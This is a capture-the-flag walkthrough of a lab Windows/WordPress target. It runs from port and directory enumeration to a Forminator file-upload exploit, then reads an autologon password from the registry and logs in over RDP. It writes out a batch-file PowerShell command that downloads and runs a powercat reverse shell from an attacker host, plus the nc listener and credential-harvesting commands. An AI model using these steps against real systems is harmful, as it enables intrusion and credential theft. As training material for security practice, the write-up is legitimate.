AVenger

Recon

We first start with a simple Nmap scan and discover several open ports and services running on them. Some notable services are HTTP on port 80, HTTPS on port 443, SMB on port 445, RDP on port 3389, WinRM on port 5985

┌──(kali㉿kali)-[~/THM/AVenger]
└─$ nmap -p- 10.10.10.22 -v -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-01 01:27 EST
Initiating Ping Scan at 01:27                                                                                                                                                                                         
Completed Connect Scan at 01:34, 437.04s elapsed (65535 total ports)                                                                                                                                                                        
Nmap scan report for 10.10.10.22                                                                                                                                                                                                            
Host is up (0.15s latency).                                                                                                                                                                                                                 
Not shown: 65476 closed tcp ports (conn-refused)                                                                                                                                                                                            
PORT      STATE    SERVICE                                                                                                                                                                                                                  
80/tcp    open     http
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
443/tcp   open     https
445/tcp   open     microsoft-ds
921/tcp   filtered unknown
3306/tcp  open     mysql
3389/tcp  open     ms-wbt-server
5985/tcp  open     wsman
6053/tcp  filtered x11
7680/tcp  open     pando-pub
38865/tcp filtered secrmmsafecopya
47001/tcp open     winrm

For more results we can run a more detailed scan with specified services and default script scan on the initially found ports

┌──(kali㉿kali)-[~/THM/AVenger]
└─$ nmap -p 80,135,139,443,445,921,3306,3389,5985,6053,7680,38865,47001 -A avenger.thm -v 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-01 01:39 EST
                                                                                                                                                                                                   
Nmap scan report for avenger.thm (10.10.10.22)                                                                                                                                                                                              
Host is up (0.16s latency).                                                                                                                                                                                                                 
                                                                                                                                                                                                                                            
PORT      STATE  SERVICE         VERSION  
80/tcp    open   http            Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28

443/tcp   open   ssl/http        Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| http-ls: Volume /
| SIZE  TIME              FILENAME
| 3.5K  2022-06-15 16:07  applications.html
| 177   2022-06-15 16:07  bitnami.css
| -     2023-04-06 09:24  dashboard/
| 30K   2015-07-16 15:32  favicon.ico
| -     2023-06-27 09:26  gift/
| -     2023-06-27 09:04  img/
| 751   2022-06-15 16:07  img/module_table_bottom.png
| 337   2022-06-15 16:07  img/module_table_top.png
| -     2023-06-28 14:39  xampp/
|_
|_ssl-date: TLS randomness does not represent time
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-title: Index of /
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
|_SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE

3306/tcp  open   mysql           MySQL 5.5.5-10.4.28-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.28-MariaDB
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: SupportsCompression, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, InteractiveClient, IgnoreSigpipes, Speaks41ProtocolOld, SupportsTransactions, LongColumnFlag, ODBCClient, Support41Auth, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 4XB}q>#2qe%%+HgQ=|{r
|_  Auth Plugin Name: mysql_native_password

3389/tcp  open   ms-wbt-server   Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: GIFT
|   NetBIOS_Domain_Name: GIFT
|   NetBIOS_Computer_Name: GIFT
|   DNS_Domain_Name: gift
|   DNS_Computer_Name: gift
|   Product_Version: 10.0.17763
|_  System_Time: 2023-12-01T06:39:46+00:00
| ssl-cert: Subject: commonName=gift
| Issuer: commonName=gift
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-11-30T06:23:38
| Not valid after:  2024-05-31T06:23:38
| MD5:   abda:da8b:9674:a0b8:0fca:21c1:5205:4867
|_SHA-1: 17d7:06a7:8f1f:fc21:416d:e372:db8b:6822:8854:7aa9
|_ssl-date: 2023-12-01T06:39:57+00:00; -1s from scanner time.

5985/tcp  open   http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
6053/tcp  closed x11
7680/tcp  closed pando-pub
38865/tcp closed secrmmsafecopya
47001/tcp open   http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Hosts: localhost, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows


135/tcp   open   msrpc           Microsoft Windows RPC
139/tcp   open   netbios-ssn     Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds?

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2023-12-01T06:39:49
|_  start_date: N/A
                                                                                                                                                                                                  
921/tcp   closed unknown

NSE: Script Post-scanning.
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Initiating NSE at 01:40
Completed NSE at 01:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.49 seconds

After the Nmap scan is completed, We run a Gobuster scan to enumerate all possiblle directories running on the web server.

┌──(kali㉿kali)-[~/THM/AVenger]
└─$ gobuster dir -u http://avenger.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://avenger.thm
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 333] [--> http://avenger.thm/img/]
/wordpress            (Status: 301) [Size: 339] [--> http://avenger.thm/wordpress/]
/examples             (Status: 503) [Size: 401]
/licenses             (Status: 403) [Size: 420]
/gift                 (Status: 301) [Size: 334] [--> http://avenger.thm/gift/]
/dashboard            (Status: 301) [Size: 339] [--> http://avenger.thm/dashboard/]
/%20                  (Status: 403) [Size: 301]
/IMG                  (Status: 301) [Size: 333] [--> http://avenger.thm/IMG/]
/*checkout*           (Status: 403) [Size: 301]
/Img                  (Status: 301) [Size: 333] [--> http://avenger.thm/Img/]
/phpmyadmin           (Status: 403) [Size: 301]
/webalizer            (Status: 403) [Size: 420]
/*docroot*            (Status: 403) [Size: 301]
/*                    (Status: 403) [Size: 301]
/con                  (Status: 403) [Size: 301]
/Dashboard            (Status: 301) [Size: 339] [--> http://avenger.thm/Dashboard/]
/http%3A              (Status: 403) [Size: 301]
/**http%3a            (Status: 403) [Size: 301]
/*http%3A             (Status: 403) [Size: 301]
/xampp                (Status: 301) [Size: 335] [--> http://avenger.thm/xampp/]
/aux                  (Status: 403) [Size: 301]
/**http%3A            (Status: 403) [Size: 301]
/Gift                 (Status: 301) [Size: 334] [--> http://avenger.thm/Gift/]
/%C0                  (Status: 403) [Size: 301]
/server-status        (Status: 403) [Size: 420]
/%3FRID%3D2671        (Status: 403) [Size: 301]
/devinmoore*          (Status: 403) [Size: 301]
/200109*              (Status: 403) [Size: 301]
.
.
.
/login%3f             (Status: 403) [Size: 301]
/%22julie%20roehm%22  (Status: 403) [Size: 301]
/%22james%20kim%22    (Status: 403) [Size: 301]
/%22britney%20spears%22 (Status: 403) [Size: 301]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

We can see few services are running such as Wordpress. Upon manual enumeration /wordpress led to the below page.

Any links on the /wordpress would redirect to avenger.tryhackme/gift. Manually opening http://avenger.thm/gift would do the same.

After adding the same to /etc/hosts.

A wpscan of http://avenger.thm/wordpress/ did not reveal much information, however a scan of http://avenger.tryhackme/gift/ revelead the following.

┌──(kali㉿kali)-[~]
└─$ wpscan --api-token [REDACTED] --url http://avenger.tryhackme/gift/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://avenger.tryhackme/gift/ [10.10.10.22]
[+] Started: Fri Dec  1 04:23:06 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
 |  - X-Powered-By: PHP/8.0.28
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://avenger.tryhackme/gift/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://avenger.tryhackme/gift/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://avenger.tryhackme/gift/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://avenger.tryhackme/gift/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Insecure, released on 2023-05-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://avenger.tryhackme/gift/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |  - http://avenger.tryhackme/gift/comments/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |
 | [!] 6 vulnerabilities identified:
 |
 | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
 |
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
 |     Fixed in: 6.2.3
 |     References:
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/

[+] WordPress theme in use: astra
 | Location: http://avenger.tryhackme/gift/wp-content/themes/astra/
 | Last Updated: 2023-11-21T00:00:00.000Z
 | Readme: http://avenger.tryhackme/gift/wp-content/themes/astra/readme.txt
 | [!] The version is out of date, the latest version is 4.5.1
 | Style URL: http://avenger.tryhackme/gift/wp-content/themes/astra/style.css
 | Style Name: Astra
 | Style URI: https://wpastra.com/
 | Description: Astra is fast, fully customizable & beautiful WordPress theme suitable for blog, personal portfolio,...
 | Author: Brainstorm Force
 | Author URI: https://wpastra.com/about/?utm_source=theme_preview&utm_medium=author_link&utm_campaign=astra_theme
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 4.1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/themes/astra/style.css, Match: 'Version: 4.1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] forminator
 | Location: http://avenger.tryhackme/gift/wp-content/plugins/forminator/
 | Last Updated: 2023-11-13T09:11:00.000Z
 | [!] The version is out of date, the latest version is 1.28.0
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Forminator < 1.24.4 - Reflected XSS
 |     Fixed in: 1.24.4
 |     References:
 |      - https://wpscan.com/vulnerability/6d50d3cc-7563-42c4-977b-f834fee711da
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3134
 |      - https://www.onvio.nl/nieuws/research-day-discovering-vulnerabilities-in-wordpress-plugins
 |
 | [!] Title: Forminator < 1.25.0 - Unauthenticated Arbitrary File Upload
 |     Fixed in: 1.25.0
 |     References:
 |      - https://wpscan.com/vulnerability/fb8db268-77d9-47b5-ad41-e9c05f0e7523
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4596
 |      - https://www.exploit-db.com/exploits/51664/
 |
 | [!] Title: Forminator and Forminator Pro < 1.27.0 - Admin+ Stored Cross-Site Scripting
 |     Fixed in: 1.27.0
 |     References:
 |      - https://wpscan.com/vulnerability/229207bb-8f8d-4579-a8e2-54516474ccb4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5119
 |
 | [!] Title: Forminator < 1.28.0 - Admin+ Arbitrary File Upload
 |     Fixed in: 1.28.0
 |     References:
 |      - https://wpscan.com/vulnerability/7d1ead56-7db2-46c4-97ed-af008e9b5515
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6133
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/13cfa202-ab90-46c0-ab53-00995bfdcaa3
 |
 | Version: 1.24.1 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/forminator/readme.txt

[+] ultimate-addons-for-gutenberg
 | Location: http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/
 | Last Updated: 2023-11-30T14:51:00.000Z
 | [!] The version is out of date, the latest version is 2.10.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.6.9 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://avenger.tryhackme/gift/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:01:09 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:01:09

[i] No Config Backups Found.

[+] Finished: Fri Dec  1 04:24:49 2023
[+] Requests Done: 179
[+] Cached Requests: 6
[+] Data Sent: 49.125 KB
[+] Data Received: 975.477 KB
[+] Memory used: 256.109 MB
[+] Elapsed time: 00:01:42

We see Forminator version 1.24.1 is in use. Which is affected by the vulnerability of unauthenticated remote command execution in version 1.24.6 (CVE-2023-4596). This vulnerability would allow us to upload a reverse shell, execute it and gain access.

Upon further manual enumeration of http://avenger.tryhackme/gift/ at the bottom we find a form with an upload file. This is where we can exploit this vulnerability.


Initial Access

First I tried uploading a reverse shell and accessing it but it was not available. I could not find the uploaded file. When we upload a file and submit, we get a message that states "Thank you for your submission . Our team is delighted to review every message carefully. You will hear from us shortly!."

We can create a html file containing an img tag, we then point the source of that image to our IP address. If we get any requests then the file is definitely being opened.

To test this

echo '<img src="http://IP_ADDRESS/">' > cat.html

We upload the file 'cat.html' and setup a http server with python, and after some time we get a request.

└─$ python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:50:23] "GET / HTTP/1.1" 200 -

This is confirmation that the file is being opened. Now we just need to upload a malicious file that can give us a reverse shell.

I was lucky enough to get it on first try with a batch file, batch files are essentially text files that contain a set of commands that can be executed when run.

We create a simple one with the same concept of the HTML file to check if we get a request back.

echo 'curl http://IP_ADDRESS/cats' > test.bat

I initially messed up this command with the wrong IP and it did not work, after quite some time, I realised I had entered the wrong IP and then it worked.

└─$ python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:56:19] code 404, message File not found
10.10.10.22 - - [01/Dec/2023 04:56:19] "GET /cats HTTP/1.1" 404 -

This confirms that we have command execution. Now we need to generate and upload a powershell reverse shell.

This can be done with the help of powercat.

└─$ powercat -c IP_ADDRESS -p 443 -e cmd -g > cat.ps1

We need to modify our batch file to give us a reverse shell.

echo "powershell -c IEX (New-Object System.Net.Webclient).DownloadString('http://[REDACTED]/cat.ps1')" > cats.bat

We then upload this and set up a listner for our reverse shell.

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.22 - - [01/Dec/2023 04:58:19] "GET /cat.ps1 HTTP/1.1" 200 -


┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443      
listening on [any] 443 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.10.22] 50600
Microsoft Windows [Version 10.0.17763.4499]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

gift\hugo

we see that our powershell reverse shell works, and after that we immediately got a shell as the user hugo.

After that we can look at the desktop of hugo for our first flag

C:\Users>cd hugo
cd hugo

C:\Users\hugo>cd desktop
cd desktop

C:\Users\hugo\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users\hugo\Desktop

07/10/2023  09:40 PM    <DIR>          .
07/10/2023  09:40 PM    <DIR>          ..
06/21/2016  03:36 PM               527 EC2 Feedback.website
06/21/2016  03:36 PM               554 EC2 Microsoft Windows Guide.website
07/25/2023  02:14 PM                48 user.txt
               3 File(s)          1,129 bytes
               2 Dir(s)  10,822,037,504 bytes free

C:\Users\hugo\Desktop>type user.txt
type user.txt
[FIRST_FLAG]
C:\Users\hugo\Desktop>

Privilege Escalation

We first check in what groups our user Hugo is in.

C:\Users\hugo\Desktop>whoami /groups

GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes
============================================================= ================ ============ ==================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Remote Desktop Users                                  Alias            S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level                        Label            S-1-16-8192

We can see we are part of Administrators, so let's try changing into Administrators directory.

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A8A4-C362

 Directory of C:\Users

06/30/2023  07:52 AM    <DIR>          .
06/30/2023  07:52 AM    <DIR>          ..
08/18/2023  12:53 PM    <DIR>          Administrator
11/25/2023  12:15 AM    <DIR>          hugo
12/12/2018  07:45 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  10,822,209,536 bytes free

C:\Users>cd Administrator
cd Administrator

Access is denied.

We however get Access is denied. It is possible that UAC or (User Account Control) is preventing us from performing any administrative tasks, we can check if UAC is enabled with this command :

C:\Users>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1

We got 0x1, this means UAC is enabled, and also we see that we're in the Mandatory Label\Medium Mandatory Level group, this means that we are in a medium integrity level shell, and UAC is preventing us from doing administrative tasks.

If we know the password of the user Hugo we can connect via RDP and just get access.

One common place where we can search for credentials is autologon, which is a feature that allows a user to configure the system to automatically log in to a specific user account without requiring manual input of the username and password.

We can find the saved credentials in the HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon registry.

C:\Users\hugo\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    .
    .
    .
    AutoAdminLogon    REG_SZ    1
    DefaultUserName    REG_SZ    hugo
    DefaultPassword    REG_SZ    [REDACTED]
    AutoLogonSID    REG_SZ    S-1-5-21-1966530601-3185510712-10604624-1008
    LastUsedUsername    REG_SZ    hugo
    ShellAppRuntime    REG_SZ    ShellAppRuntime.exe

Here we have the password of Hugo

Now we simply connect with RDP.

sudo xfreerdp /u:hugo /p:[REDACTED] /cert:ignore /v:10.10.10.22 /dynamic-resolution

Now we have successfully connected via RDP.

When trying to ccessing the Administrator folder we get a UAC prompt, simply click continue and can get our root flag.

Last updated

Was this helpful?